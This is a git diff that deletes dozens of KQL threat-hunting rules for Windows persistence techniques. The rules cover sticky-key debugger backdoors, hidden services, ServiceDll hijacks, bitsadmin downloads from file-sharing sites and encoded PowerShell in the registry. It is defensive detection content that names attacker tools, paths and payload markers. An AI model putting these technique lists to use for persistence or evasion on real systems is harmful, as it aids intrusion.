-DeviceRegistryEvents
-| where (RegistryKey endswith "\\Control\\Lsa\\Security Packages" or RegistryKey endswith "\\Control\\Lsa\\OSConfig\\Security Packages") and (not((InitiatingProcessFolderPath in~ ("C:\\Windows\\system32\\msiexec.exe", "C:\\Windows\\syswow64\\MsiExec.exe"))))
\ No newline at end of file
diff --git a/Persistence/ServiceDll_Hijack.kql b/Persistence/ServiceDll_Hijack.kql
deleted file mode 100644
index fb9f8be0..00000000
--- a/Persistence/ServiceDll_Hijack.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: frack113
-// Date: 2022/02/04
-// Level: medium
-// Description: Detects changes to the "ServiceDLL" value related to a service in the registry.
-This is often used as a method of persistence.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceRegistryEvents
-| where ((RegistryKey contains "\\System" and RegistryKey contains "ControlSet" and RegistryKey contains "\\Services") and RegistryKey endswith "\\Parameters\\ServiceDll") and (not(((RegistryValueData =~ "%%systemroot%%\\system32\\ntdsa.dll" and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe" and RegistryKey endswith "\\Services\\NTDS\\Parameters\\ServiceDll") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\poqexec.exe" or RegistryValueData =~ "C:\\Windows\\system32\\spool\\drivers\\x64\\3\\PrintConfig.dll"))) and (not((RegistryValueData =~ "C:\\Windows\\System32\\STAgent.dll" and InitiatingProcessFolderPath endswith "\\regsvr32.exe")))
\ No newline at end of file
diff --git a/Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql b/Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
deleted file mode 100644
index 04c45340..00000000
--- a/Persistence/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index a2adcfc1..00000000
--- a/Persistence/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: medium
-// Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Persistence/Session_Manager_Autorun_Keys_Modification.kql b/Persistence/Session_Manager_Autorun_Keys_Modification.kql
deleted file mode 100644
index d2a2b737..00000000
--- a/Persistence/Session_Manager_Autorun_Keys_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects modification of autostart extensibility point (ASEP) in registry.
-// Tags: attack.persistence, attack.t1547.001, attack.t1546.009
-DeviceRegistryEvents
-| where RegistryKey contains "\\System\\CurrentControlSet\\Control\\Session Manager" and (RegistryKey contains "\\SetupExecute" or RegistryKey contains "\\S0InitialCommand" or RegistryKey contains "\\KnownDlls" or RegistryKey contains "\\Execute" or RegistryKey contains "\\BootExecute" or RegistryKey contains "\\AppCertDlls") and (not(RegistryValueData =~ "(Empty)"))
\ No newline at end of file
diff --git a/Persistence/Shell_Process_Spawned_by_Java.EXE.kql b/Persistence/Shell_Process_Spawned_by_Java.EXE.kql
deleted file mode 100644
index 534b99c8..00000000
--- a/Persistence/Shell_Process_Spawned_by_Java.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
-// Date: 2021/12/17
-// Level: medium
-// Description: Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and InitiatingProcessFolderPath endswith "\\java.exe") and (not((ProcessCommandLine contains "build" and InitiatingProcessFolderPath contains "build")))
\ No newline at end of file
diff --git a/Persistence/Startup_Folder_File_Write.kql b/Persistence/Startup_Folder_File_Write.kql
deleted file mode 100644
index d547ca8a..00000000
--- a/Persistence/Startup_Folder_File_Write.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
-// Tags: attack.persistence, attack.t1547.001
-DeviceFileEvents
-| where FolderPath contains "\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp" and (not((InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wuauclt.exe" or FolderPath startswith "C:\\$WINDOWS.~BT\\NewOS\\")))
\ No newline at end of file
diff --git a/Persistence/Sticky_Key_Like_Backdoor_Execution.kql b/Persistence/Sticky_Key_Like_Backdoor_Execution.kql
deleted file mode 100644
index 0509bca7..00000000
--- a/Persistence/Sticky_Key_Like_Backdoor_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
-// Date: 2018/03/15
-// Level: critical
-// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
-DeviceProcessEvents
-| where (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "Magnify.exe" or ProcessCommandLine contains "Narrator.exe" or ProcessCommandLine contains "DisplaySwitch.exe") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\wt.exe") and InitiatingProcessFolderPath endswith "\\winlogon.exe"
\ No newline at end of file
diff --git a/Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql b/Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql
deleted file mode 100644
index 0a1e634c..00000000
--- a/Persistence/Sticky_Key_Like_Backdoor_Usage_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community
-// Date: 2018/03/15
-// Level: critical
-// Description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.008, car.2014-11-003, car.2014-11-008
-DeviceRegistryEvents
-| where RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\utilman.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\osk.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Magnify.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Narrator.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\DisplaySwitch.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\atbroker.exe\\Debugger" or RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\HelpPane.exe\\Debugger"
\ No newline at end of file
diff --git a/Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql b/Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql
deleted file mode 100644
index e3938878..00000000
--- a/Persistence/Suspicious_ASPX_File_Drop_by_Exchange.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), MSTI (query, idea)
-// Date: 2022/10/01
-// Level: high
-// Description: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
-// Tags: attack.persistence, attack.t1505.003
-DeviceFileEvents
-| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe" and (FolderPath contains "FrontEnd\\HttpProxy\\" or FolderPath contains "\\inetpub\\wwwroot\\aspnet_client\\")) and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Child_Process_Of_SQL_Server.kql b/Persistence/Suspicious_Child_Process_Of_SQL_Server.kql
deleted file mode 100644
index b669d6d5..00000000
--- a/Persistence/Suspicious_Child_Process_Of_SQL_Server.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye Team, wagga
-// Date: 2020/12/11
-// Level: high
-// Description: Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.t1505.003, attack.t1190, attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\wsl.exe") and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (not((ProcessCommandLine startswith "\"C:\\Windows\\system32\\cmd.exe\" " and FolderPath =~ "C:\\Windows\\System32\\cmd.exe" and InitiatingProcessFolderPath endswith "DATEV_DBENGINE\\MSSQL\\Binn\\sqlservr.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql b/Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
deleted file mode 100644
index b9990b32..00000000
--- a/Persistence/Suspicious_Child_Process_Of_Veeam_Dabatase.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/04
-// Level: critical
-// Description: Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
-// Tags: attack.initial_access, attack.persistence, attack.privilege_escalation
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "VEEAMSQL" and InitiatingProcessFolderPath endswith "\\sqlservr.exe") and (((ProcessCommandLine contains "-ex " or ProcessCommandLine contains "bypass" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "DownloadString" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "copy ") and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\wt.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netstat.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\ping.exe" or FolderPath endswith "\\tasklist.exe" or FolderPath endswith "\\whoami.exe"))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql b/Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql
deleted file mode 100644
index 6ce7feb5..00000000
--- a/Persistence/Suspicious_Chromium_Browser_Instance_Executed_With_Custom_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Aedan Russell, frack113, X__Junior (Nextron Systems)
-// Date: 2022/06/19
-// Level: high
-// Description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension
-// Tags: attack.persistence, attack.t1176
-DeviceProcessEvents
-| where ProcessCommandLine contains "--load-extension=" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or FolderPath endswith "\\vivaldi.exe") and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Debugger_Registration_Cmdline.kql b/Persistence/Suspicious_Debugger_Registration_Cmdline.kql
deleted file mode 100644
index 8a4f2a41..00000000
--- a/Persistence/Suspicious_Debugger_Registration_Cmdline.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro
-// Date: 2019/09/06
-// Level: high
-// Description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.008
-DeviceProcessEvents
-| where ProcessCommandLine contains "\\CurrentVersion\\Image File Execution Options\\" and (ProcessCommandLine contains "sethc.exe" or ProcessCommandLine contains "utilman.exe" or ProcessCommandLine contains "osk.exe" or ProcessCommandLine contains "magnify.exe" or ProcessCommandLine contains "narrator.exe" or ProcessCommandLine contains "displayswitch.exe" or ProcessCommandLine contains "atbroker.exe" or ProcessCommandLine contains "HelpPane.exe")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql b/Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql
deleted file mode 100644
index 194705f0..00000000
--- a/Persistence/Suspicious_Download_From_Direct_IP_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file using an URL that contains an IP
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "://1" or ProcessCommandLine contains "://2" or ProcessCommandLine contains "://3" or ProcessCommandLine contains "://4" or ProcessCommandLine contains "://5" or ProcessCommandLine contains "://6" or ProcessCommandLine contains "://7" or ProcessCommandLine contains "://8" or ProcessCommandLine contains "://9") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")) and (not(ProcessCommandLine contains "://7-"))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql b/Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql
deleted file mode 100644
index b4aa432b..00000000
--- a/Persistence/Suspicious_Download_From_File-Sharing_Website_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file from a suspicious domain
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".githubusercontent.com" or ProcessCommandLine contains "anonfiles.com" or ProcessCommandLine contains "cdn.discordapp.com" or ProcessCommandLine contains "cdn.discordapp.com/attachments/" or ProcessCommandLine contains "ddns.net" or ProcessCommandLine contains "dl.dropboxusercontent.com" or ProcessCommandLine contains "ghostbin.co" or ProcessCommandLine contains "glitch.me" or ProcessCommandLine contains "gofile.io" or ProcessCommandLine contains "hastebin.com" or ProcessCommandLine contains "mediafire.com" or ProcessCommandLine contains "mega.nz" or ProcessCommandLine contains "onrender.com" or ProcessCommandLine contains "paste.ee" or ProcessCommandLine contains "pastebin.com" or ProcessCommandLine contains "pastebin.pl" or ProcessCommandLine contains "pastetext.net" or ProcessCommandLine contains "privatlab.com" or ProcessCommandLine contains "privatlab.net" or ProcessCommandLine contains "send.exploit.in" or ProcessCommandLine contains "sendspace.com" or ProcessCommandLine contains "storage.googleapis.com" or ProcessCommandLine contains "storjshare.io" or ProcessCommandLine contains "supabase.co" or ProcessCommandLine contains "temp.sh" or ProcessCommandLine contains "transfer.sh" or ProcessCommandLine contains "ufile.io") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql b/Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql
deleted file mode 100644
index 243e56dd..00000000
--- a/Persistence/Suspicious_Driver_Install_by_pnputil.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Hai Vaknin @LuxNoBulIshit, Avihay eldad  @aloneliassaf, Austin Songer @austinsonger
-// Date: 2021/09/30
-// Level: medium
-// Description: Detects when a possible suspicious driver is being installed via pnputil.exe lolbin
-// Tags: attack.persistence, attack.t1547
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-i" or ProcessCommandLine contains "/install" or ProcessCommandLine contains "-a" or ProcessCommandLine contains "/add-driver" or ProcessCommandLine contains ".inf") and FolderPath endswith "\\pnputil.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql b/Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql
deleted file mode 100644
index 700cfc45..00000000
--- a/Persistence/Suspicious_Environment_Variable_Has_Been_Registered.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/20
-// Level: high
-// Description: Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings
-// Tags: attack.defense_evasion, attack.persistence
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("powershell", "pwsh")) or (RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "C:\\Users\\Public\\" or RegistryValueData contains "TVqQAAMAAAAEAAAA" or RegistryValueData contains "TVpQAAIAAAAEAA8A" or RegistryValueData contains "TVqAAAEAAAAEABAA" or RegistryValueData contains "TVoAAAAAAAAAAAAA" or RegistryValueData contains "TVpTAQEAAAAEAAAA" or RegistryValueData contains "SW52b2tlL" or RegistryValueData contains "ludm9rZS" or RegistryValueData contains "JbnZva2Ut" or RegistryValueData contains "SQBuAHYAbwBrAGUALQ" or RegistryValueData contains "kAbgB2AG8AawBlAC0A" or RegistryValueData contains "JAG4AdgBvAGsAZQAtA") or (RegistryValueData startswith "SUVY" or RegistryValueData startswith "SQBFAF" or RegistryValueData startswith "SQBuAH" or RegistryValueData startswith "cwBhA" or RegistryValueData startswith "aWV4" or RegistryValueData startswith "aQBlA" or RegistryValueData startswith "R2V0" or RegistryValueData startswith "dmFy" or RegistryValueData startswith "dgBhA" or RegistryValueData startswith "dXNpbm" or RegistryValueData startswith "H4sIA" or RegistryValueData startswith "Y21k" or RegistryValueData startswith "cABhAH" or RegistryValueData startswith "Qzpc" or RegistryValueData startswith "Yzpc")) and RegistryKey contains "\\Environment"
\ No newline at end of file
diff --git a/Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql b/Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql
deleted file mode 100644
index f12091dd..00000000
--- a/Persistence/Suspicious_File_Creation_Activity_From_Fake_Recycle.Bin_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/12
-// Level: high
-// Description: Detects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
-// Tags: attack.persistence, attack.defense_evasion
-DeviceFileEvents
-| where (InitiatingProcessFolderPath contains "RECYCLERS.BIN\\" or InitiatingProcessFolderPath contains "RECYCLER.BIN\\") or (FolderPath contains "RECYCLERS.BIN\\" or FolderPath contains "RECYCLER.BIN\\")
\ No newline at end of file
diff --git a/Persistence/Suspicious_File_Drop_by_Exchange.kql b/Persistence/Suspicious_File_Drop_by_Exchange.kql
deleted file mode 100644
index 6f40640f..00000000
--- a/Persistence/Suspicious_File_Drop_by_Exchange.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/10/04
-// Level: medium
-// Description: Detects suspicious file type dropped by an Exchange component in IIS
-// Tags: attack.persistence, attack.t1190, attack.initial_access, attack.t1505.003
-DeviceFileEvents
-| where (InitiatingProcessCommandLine contains "MSExchange" and InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath endswith ".aspx" or FolderPath endswith ".asp" or FolderPath endswith ".ashx" or FolderPath endswith ".ps1" or FolderPath endswith ".bat" or FolderPath endswith ".exe" or FolderPath endswith ".dll" or FolderPath endswith ".vbs")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Get-Variable.exe_Creation.kql b/Persistence/Suspicious_Get-Variable.exe_Creation.kql
deleted file mode 100644
index da1a04b7..00000000
--- a/Persistence/Suspicious_Get-Variable.exe_Creation.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2022/04/23
-// Level: high
-// Description: Get-Variable is a valid PowerShell cmdlet
-WindowsApps is by default in the path where PowerShell is executed.
-So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
-
-// Tags: attack.persistence, attack.t1546, attack.defense_evasion, attack.t1027
-DeviceFileEvents
-| where FolderPath endswith "Local\\Microsoft\\WindowsApps\\Get-Variable.exe"
\ No newline at end of file
diff --git a/Persistence/Suspicious_GrpConv_Execution.kql b/Persistence/Suspicious_GrpConv_Execution.kql
deleted file mode 100644
index 1bc03b8a..00000000
--- a/Persistence/Suspicious_GrpConv_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/05/19
-// Level: high
-// Description: Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors
-// Tags: attack.persistence, attack.t1547
-DeviceProcessEvents
-| where ProcessCommandLine contains "grpconv.exe -o" or ProcessCommandLine contains "grpconv -o"
\ No newline at end of file
diff --git a/Persistence/Suspicious_IIS_Module_Registration.kql b/Persistence/Suspicious_IIS_Module_Registration.kql
deleted file mode 100644
index 02baba3a..00000000
--- a/Persistence/Suspicious_IIS_Module_Registration.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Microsoft (idea)
-// Date: 2022/08/04
-// Level: high
-// Description: Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors
-// Tags: attack.persistence, attack.t1505.004
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\w3wp.exe" and (ProcessCommandLine contains "appcmd.exe add module" or (ProcessCommandLine contains " system.enterpriseservices.internal.publish" and FolderPath endswith "\\powershell.exe") or (ProcessCommandLine contains "gacutil" and ProcessCommandLine contains " /I"))
\ No newline at end of file
diff --git a/Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql b/Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql
deleted file mode 100644
index 039ecce5..00000000
--- a/Persistence/Suspicious_MSExchangeMailboxReplication_ASPX_Write.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
-// Tags: attack.initial_access, attack.t1190, attack.persistence, attack.t1505.003
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp")
\ No newline at end of file
diff --git a/Persistence/Suspicious_New_Service_Creation.kql b/Persistence/Suspicious_New_Service_Creation.kql
deleted file mode 100644
index 2450ee8b..00000000
--- a/Persistence/Suspicious_New_Service_Creation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/14
-// Level: high
-// Description: Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1543.003
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "New-Service" and ProcessCommandLine contains "-BinaryPathName") or ((ProcessCommandLine contains "create" and ProcessCommandLine contains "binPath=") and FolderPath endswith "\\sc.exe")) and (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Outlook_Macro_Created.kql b/Persistence/Suspicious_Outlook_Macro_Created.kql
deleted file mode 100644
index e9f30292..00000000
--- a/Persistence/Suspicious_Outlook_Macro_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: high
-// Description: Detects the creation of a macro file for Outlook.
-// Tags: attack.persistence, attack.command_and_control, attack.t1137, attack.t1008, attack.t1546
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft\\Outlook\\VbaProject.OTM" and (not(InitiatingProcessFolderPath endswith "\\outlook.exe"))
\ No newline at end of file
diff --git a/Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql b/Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
deleted file mode 100644
index 504899dd..00000000
--- a/Persistence/Suspicious_Persistence_Via_VMwareToolBoxCmd.EXE_VM_State_Change_Script.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/14
-// Level: high
-// Description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state
-// Tags: attack.execution, attack.persistence, attack.t1059
-DeviceProcessEvents
-| where (ProcessCommandLine contains " script " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\VMwareToolBoxCmd.exe" or ProcessVersionInfoOriginalFileName =~ "toolbox-cmd.exe") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp")
\ No newline at end of file
diff --git a/Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql b/Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql
deleted file mode 100644
index bf7164d3..00000000
--- a/Persistence/Suspicious_Powershell_In_Registry_Run_Keys.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Florian Roth (Nextron Systems)
-// Date: 2022/03/17
-// Level: medium
-// Description: Detects potential PowerShell commands or code within registry run keys
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
